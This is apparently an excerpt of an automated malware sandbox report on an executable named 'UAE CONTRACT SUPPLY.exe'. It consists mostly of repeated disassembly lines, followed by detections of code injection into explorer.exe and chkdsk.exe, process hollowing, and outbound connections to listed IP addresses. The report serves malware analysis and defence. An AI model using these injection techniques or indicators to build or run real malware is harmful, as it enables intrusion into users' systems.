      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F513A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F513A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4CB1E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4CB1E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4CB1E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E5541E8 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4FA185 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4EC182 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F2990 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E5451BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E5451BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E5451BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E5451BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F61A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F61A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E5469A6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_00562CD6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_005658DB mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_005658C3 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_00564B16 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_00564FBF mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056DC577 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056DC577 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056F3D43 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05733540 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05763D40 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056D7D50 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0573A537 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05788D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0577E539 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056E4D3B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056E4D3B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056E4D3B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056C3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056C3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056C3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056C3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056C3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056C3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056C3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056C3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056C3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056C3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056C3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056C3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056C3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056BAD30 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05768DF1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056CD5E0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056CD5E0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0577FDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0577FDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0577FDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0577FDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05736DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05736DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05736DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05736DC9 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05736DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05736DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056E35A1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_057805AC mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_057805AC mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056E1DB5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056E1DB5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056E1DB5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056B2D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056B2D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056B2D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056B2D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056B2D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056E2581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056E2581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056E2581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056E2581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056EFD9B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056EFD9B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056D746D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0574C450 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0574C450 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056EA44B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056EBC2C mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05771C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05771C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05771C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05771C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05771C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05771C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05771C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05771C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05771C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05771C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05771C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05771C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05771C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05771C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0578740D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0578740D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0578740D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05736C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05736C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05736C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05736C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05736CF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05736CF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05736CF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_057714FB mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05788CD6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056C849B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056CFF60 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05788F6A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056CEF40 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056B4F2E mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056B4F2E mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056EE730 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056EA70E mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056EA70E mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0574FF10 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0574FF10 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0578070D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0578070D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056DF716 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056F37F5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05737794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05737794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05737794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056C8794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056C766D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056DAE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056DAE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056DAE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056DAE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056DAE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056C7E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056C7E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056C7E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056C7E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056C7E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056C7E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0577AE44 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0577AE44 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0576FE3F mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056BE620 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056BC600 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056BC600 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056BC600 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056E8E00 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056EA61C mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056EA61C mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05771608 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056E16E0 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056C76E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056E36CC mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056F8EC7 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05788ED6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0576FEC0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_057346A7 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05780EA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05780EA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05780EA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0574FE87 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056BC962 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056BB171 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056BB171 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056DB944 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056DB944 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056D4120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056D4120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056D4120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056D4120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056D4120 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056E513A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056E513A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056B9100 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056B9100 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056B9100 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056BB1E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056BB1E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056BB1E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_057441E8 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_057351BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_057351BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_057351BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_057351BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056E61A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056E61A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_057749A4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_057749A4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_057749A4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_057749A4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_057369A6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056EA185 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056DC182 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056E2990 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05772073 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05781074 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056D0050 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056D0050 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056E002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056E002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056E002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056E002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056E002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056CB02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056CB02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056CB02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056CB02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056DA830 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056DA830 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056DA830 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056DA830 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05737016 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05737016 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05737016 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05784015 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05784015 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056B58EC mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056B40E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056B40E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056B40E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0574B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_0574B8D0 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_0574B8D0 mov eax, dword ptr fs:[00000030h] (4 occurrences)
      Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_056F90AF mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_056E20A0 mov eax, dword ptr fs:[00000030h] (6 occurrences)
      Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_056EF0BF mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_056EF0BF mov eax, dword ptr fs:[00000030h] (2 occurrences)
      Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_056B9080 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_05733884 mov eax, dword ptr fs:[00000030h] (2 occurrences)
      Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_056BDB60 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 16_2_056E3B7A mov eax, dword ptr fs:[00000030h] (2 occurrences)
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe | Process token adjusted: Debug
      Source: C:\Windows\SysWOW64\chkdsk.exe | Process token adjusted: Debug

      HIPS / PFW / Operating System Protection Evasion:

      System process connects to network (likely due to code injection or exploit)
      Source: C:\Windows\explorer.exe | Network Connect: 185.230.60.102 80
      Source: C:\Windows\explorer.exe | Network Connect: 104.21.32.11 80
      Source: C:\Windows\explorer.exe | Network Connect: 34.102.136.180 80
      Maps a DLL or memory area into another process
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe | Section loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and write (2 occurrences)
      Source: C:\Windows\SysWOW64\chkdsk.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
      Source: C:\Windows\SysWOW64\chkdsk.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
      Modifies the context of a thread in another process (thread injection)
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe | Thread register set: target process: 3440
      Source: C:\Windows\SysWOW64\chkdsk.exe | Thread register set: target process: 3440
      Queues an APC in another process (thread injection)
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe | Thread APC queued: target process: C:\Windows\explorer.exe
      Sample uses process hollowing technique
